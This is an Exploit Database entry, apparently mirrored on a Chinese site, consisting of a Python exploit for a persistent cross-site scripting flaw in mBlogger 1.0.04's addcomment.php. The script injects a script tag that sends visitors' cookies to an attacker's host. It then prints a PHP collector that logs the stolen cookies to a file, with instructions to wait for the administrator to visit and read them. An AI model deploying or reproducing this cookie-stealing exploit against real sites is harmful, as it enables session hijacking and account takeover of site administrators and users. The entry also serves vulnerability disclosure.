mBlogger 1.0.04 – ‘addcomment.php’ Persistent Cross-Site Scripting

• Exploit Database
• 13 阅读

• 作者： Ptrace Security
  日期： 2010-09-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14890/

• #!/usr/bin/python
  #
  # Exploit Title: mBlogger v1.0.04 (addcomment.php) Persistent XSS Exploit
  # Date : 04 September 2010
  # Author : Ptrace Security (Gianni Gnesa [gnix])
  # Contact: research[at]ptrace-security[dot]com
  # Software Link: http://sourceforge.net/projects/mblogger/
  # Version: 1.0.04
  # Tested on: EasyPHP 5.3.1.0 for Windows
  #
  #
  # Description
  # ===========
  #
  # + addcomment.php => An SQL Injection at line 32 allows to insert javascript
  # that will be executed from the client's browser when he
  # visits the page viewpost.php?postID=<number>.
  #
  # 29: $commentAuthor = $_POST['commentAuthor'];
  # 30: $commentText = $_POST['commentText'];
  # 31: $postID = $_GET['postID'];
  # 32: $query = "INSERT INTO comments (user, comment, postid) VALUES
  # ('$commentAuthor', '$commentText', '$postID')";
  # 33: if(!mysql_query($query, $connection))
  # 34: {
  # 35:die("Error updating post: " . mysql_error());
  # 36: }
  #
  
  import sys
  import http.client
  import urllib.parse
  
  
  def fatal(message):
  print(message)
  exit(1)
  
  
  def usage(program):
  print('Usage: '+ program +' <victim> <mBlogger path> <attacker>\n')
  print('Example: '+ program +' localhost /mBlogger/ localhost')
  print(' '+ program +' www.victim.com /path/ www.attacker.com')
  return
  
  
  def getRemotePHPCode():
  source= '<?php\n'
  source += '$cs = explode("; ", $_GET[\'c\']);\n'
  source += '$fp = fopen(\'data.txt\',\'a\');\n'
  source += 'if(!empty($cs))\n'
  source += ' foreach($cs as $k => $v) {\n'
  source += 'if(preg_match("/^(.*?)\=(.*)$/", $v, $r))\n'
  source += ' fwrite($fp,urldecode($r[1])."=".urldecode($r[2])."\\r\\n");\n'
  source += 'else fwrite($fp, "cannot decode $v");\n'
  source += ' }\n'
  source += 'fclose($fp);\n'
  source += '?>'
  return source
  
  
  def injectJavascript(victim, path, attacker):
  payload= '<script>\nd=new Image;\nd.src=\"http://' + attacker
  payload += '/c.php?c=\"+escape(document.cookie);\n</script>\n'
  
  headers = {'Content-type':'application/x-www-form-urlencoded','Accept':'text/plain'}
  params= urllib.parse.urlencode({'commentAuthor':'admin','commentText':payload,'submitcomment':'Submit'})
  con = http.client.HTTPConnection(victim)
  
  con.request('POST', path + 'addcomment.php?postID=1', params, headers)
  res = con.getresponse()
  if res.status != 200:
  return False
  
  con.close()
  return True
  
  
  def exploit(victim, path, attacker):
  print('[+] Injecting Javascript')
  success = injectJavascript(victim, path, attacker)
  if not success:
  fatal('[!] Injection failed')
  
  print('[+] Generating PHP code for malicious site\n')
  print(getRemotePHPCode() + '\n')
  
  print('[?] Instruction to use this exploit:')
  print('1. Save the previous code in http://' + attacker + '/c.php')
  print('2. Wait that the administrator visits ')
  print(' http://'+ victim +'/'+ path +'viewpost.php?postID=1')
  print('3. Read stolen cookies from http://'+ attacker +'/' + 'data.txt')
  return
  
  
  
  print('\n+-----------------------------------------------------------------------------+')
  print('| mBlogger v1.0.04 (addcomment.php) Persistent XSS Exploit by Ptrace Security |')
  print('+-----------------------------------------------------------------------------+\n')
  
  if len(sys.argv) != 4:
   usage(sys.argv[0])
  else:
   exploit(sys.argv[1],sys.argv[2], sys.argv[3])